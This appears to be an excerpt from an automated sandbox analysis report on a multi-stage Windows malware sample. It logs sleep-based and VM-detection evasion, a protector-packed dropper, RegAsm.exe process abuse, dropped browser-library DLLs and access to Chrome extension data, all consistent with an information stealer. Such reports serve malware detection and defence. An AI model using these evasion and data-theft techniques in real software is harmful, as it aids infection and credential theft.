Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Special instruction interceptor: First address: 1050685 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\FileApp.exe	Memory allocated: 30A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Memory allocated: 3220000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Memory allocated: 5220000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Memory allocated: 6040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Memory allocated: 7040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Memory allocated: 14B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Memory allocated: 30E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Memory allocated: 2F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe	Memory allocated: 1780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe	Memory allocated: 3230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe	Memory allocated: 17A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Memory allocated: 2130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Memory allocated: 23C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Memory allocated: 2130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Memory allocated: 1360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Memory allocated: 30E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Memory allocated: 2EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Memory allocated: 17A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Memory allocated: 3290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Memory allocated: 1810000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Memory allocated: 770000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Memory allocated: 2290000 memory reserve \| memory write watch
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Memory allocated: 4290000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: B10000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2770000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 4770000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 1660000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 3170000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 30A0000 memory reserve \| memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Memory allocated: 1520000 memory reserve \| memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Memory allocated: 30D0000 memory reserve \| memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Memory allocated: 50D0000 memory reserve \| memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Memory allocated: 3740000 memory reserve \| memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Memory allocated: 39C0000 memory reserve \| memory write watch
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Memory allocated: 3740000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Memory allocated: 1870000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Memory allocated: 31E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Memory allocated: 51E0000 memory reserve \| memory write watch

Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\FileApp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 1837
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 621

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d7077a2064d_l[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\627000\Legitimate.pif	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\Users\userEHJKFCGHID.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 5.1 %

Source: C:\Users\user\Desktop\FileApp.exe TID: 2536	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2360	Thread sleep count: 281 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2360	Thread sleep time: -56200s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe TID: 2876	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 5884	Thread sleep count: 93 > 30	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 5884	Thread sleep time: -186093s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 964	Thread sleep count: 105 > 30	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 964	Thread sleep time: -210105s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 5264	Thread sleep count: 145 > 30	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 5264	Thread sleep time: -290145s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 368	Thread sleep count: 128 > 30	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 368	Thread sleep time: -256128s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 5368	Thread sleep count: 260 > 30	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 5368	Thread sleep time: -1560000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 2032	Thread sleep count: 101 > 30	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 2032	Thread sleep time: -202101s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 4876	Thread sleep count: 113 > 30	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 4876	Thread sleep time: -226113s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 6472	Thread sleep count: 96 > 30	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe TID: 6472	Thread sleep time: -192096s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe TID: 2220	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe TID: 1592	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe TID: 5128	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe TID: 2832	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5720	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3648	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4236	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5316	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 4928	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 1408	Thread sleep time: -30000s >= -30000s
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe TID: 6532	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe TID: 6788	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe TID: 4020	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Code function: 14_2_004062EB FindFirstFileW,FindClose,	14_2_004062EB
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe	Code function: 14_2_00406CB1 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	14_2_00406CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	22_2_0040D8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	22_2_0040F4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	22_2_0040BCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	22_2_004139B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	22_2_0040E270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	22_2_00401710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	22_2_004143F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	22_2_0040DC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	22_2_00414050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	22_2_0040EB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 22_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,	22_2_004133C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 22_2_00401160 GetSystemInfo,ExitProcess,

22_2_00401160

Source: C:\Users\user\Desktop\FileApp.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3124653111.0000000001028000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: FileApp.exe, 00000000.00000000.2112885323.0000000000692000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: KWDYALOFJGZUXTEBGMAEYQJZQEJUSHGFSJJHXIAWXETHZSZCXATOVIRUNEH
Source: FileApp.exe, 00000000.00000002.2120357581.0000000003221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q1BODKZWBQQMLCMYVMCIXXAQEPJMQHJSTTKQSTJDLWPIDAGHWDTXN`
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.00000000014FE000.00000004.00000020.00020000.00000000.sdmp, kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3380418917.0000023733E2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2730398887.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: XLPHGFSPQHIXQJMWIYQNEBJBPSRAXIXVQJURCRMXGFAG
Source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000000.2384928035.0000000000612000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: vMciv4FTWk
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3124653111.0000000001028000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: FileApp.exe, 00000000.00000002.2130547013.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: NQPLQEMUWDVSEGGAGTZFUSSKMLSWZZHLRDKHCPZQSKPE
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: hCLzvwEjrpbnzEwhXNXFGBXIZAYKTKFHNSJMXXSQXPDUPPISSNNZVDVOZHMLXRYKJQLBNJWUMPLHSGRTKZEHDCQNEPVFRWODTRYSNEDBETDHjLQKFJELXWCCPPPTLBRSPXGPTYVBWSUTVKRBACAXUAXCVJHNSYEFTQ4TVZLTIRMSALDCPEFWEYSSXCFHRBIGFOGEMHRISPNAWFSXDYPHYCLTNNCMKGP0HDPHSAHCDMQZEFXMZIVMVHGH>HDFRATRTNLSGHZWIZIRXFENQEEZPWRX@DMFBDPONVTBWVOAXTZSGJYCEBTAJQMTERSPSJGNNTAZNTHOEZKMSD`RIETTMIEZEYBRQJRNHSEMVSNUJHCJWLGNVQIDRRMWTZMIMILNTUANEPZFLPZQKLGHHGJKDTAPSAMTKGLNIEDKATDJVDDFVEEMHFIVHNDTRSIODDMDGNZSTOVDQOYZM6VMVKIAJAGEUTMHWUQUAJWGFJCDYbNZJKWACNUZWQXMKJTABCEYFTTVOGUUYUFQGAJYBOVVYQVRSUBTRZQDEQEOEROXTQXRDXDEODFNXKIHCZEWREOWTTYRXC:UIXMFMRGOBBYKZLHLBCTUBZCVNIUK2LPOLHALZEADMFBLFEADBNRUFEJZHIXWULRQTPZFTKNACEGTQFAPYHDPYDHLLIVV8OLMVCVQXIEXFCTZTNNHRRCMDXZIG(LVDQPIOMZJYCMKFTNODZfORYFNDQNGAADYLKKRCILOIDAYDOEPIHMUJKYCYNENGZIXIWCXKFfVLWACCLOYZGETQAJUDREGEFFSJYBMVQIWOEVGLZJJZKYSNCBBTLjPCLUSHWYCDMGKISISZFXQNFXCWKMTTYJHDDHPKPSRRNASZONOGBGR<GLBUXMWNNYZIJDNECORDWZMIYZCTSA.ANHNKGZTWXJCVNGSZFZYWGIDQGYOQNENCSDMBIIGZFWQ>NJVEXNXMCCREESHHYHQBSCOIBEMTYRHnFTJQDGKIZKDHFHEFMDVUSASKFKJOVQIMQCZVJNZXWGMKJVOSYJZSXIE4GZCMALKPIHQZXYXIEBNWATMTUH\SHWPGTJQWTVIAUWTQFUITIFJVCRPKPBFCWRMNKRCHGNVBB@GVAFOARNLNFWZVBTVTYQTMTSVRUTSHQFLGJBVHJIFWEUKOYHPFFQZHSZFZACAAUQEMRTBEWGHQFZQVDEYVWXEOTZDUbJFJTZFSOXUYUJKEFULLZHBXBJEZNXPOQHVKEELTDQHYKGINBK,KLPMOLLFUOJEJCGRWNAEYDLRSDDNXCPPOHZZAHHDUOAEKTTDYZELHSPUXQXWEFCGNDHCFJUWRHMHMEMVPLFUAIBFHFTBPKJHTVLIEHGFCCUZPSGGYEOJBQIEZNRFRSFCZXJAYADMXXTKP:RHGKLDDGTRRMVWKJMXNKBIDNUOKQGDOYQHLWVAHOCVBIOUYRWVYOTHLMCRCAKLYNVKAEJWYUEXGDQWNOJJFZCGRBGTZCLZTUNRJDTABXTZLJ6UTXDLIYRSQOPKDBSOPAOKRZZMAZHKZRATLHQSUDUXQKJQVKGDBHDXSJUAVHPYOBB4THOKGCFDNQQBWZGCSSNEGDXAWWXLVXIQODTIPHZBESTOIIFBQZZYALBBIXTSNJTSYFGVYJYLQBWTNUATMOUYFVPVKVSWSQGBGCOYRVWTOSEMKO:YKTUJTZIFAYDQPBEZPSVIBMVCLMAJbBODKZWBQQMLCMYVMCIXXAQEPJMQHJSTTKQSTJDLWPIDAGHWDTpSDMQWYAXEEZWTFDQNWMYYRHWXKLQHYULQPVZVOZGWJERCC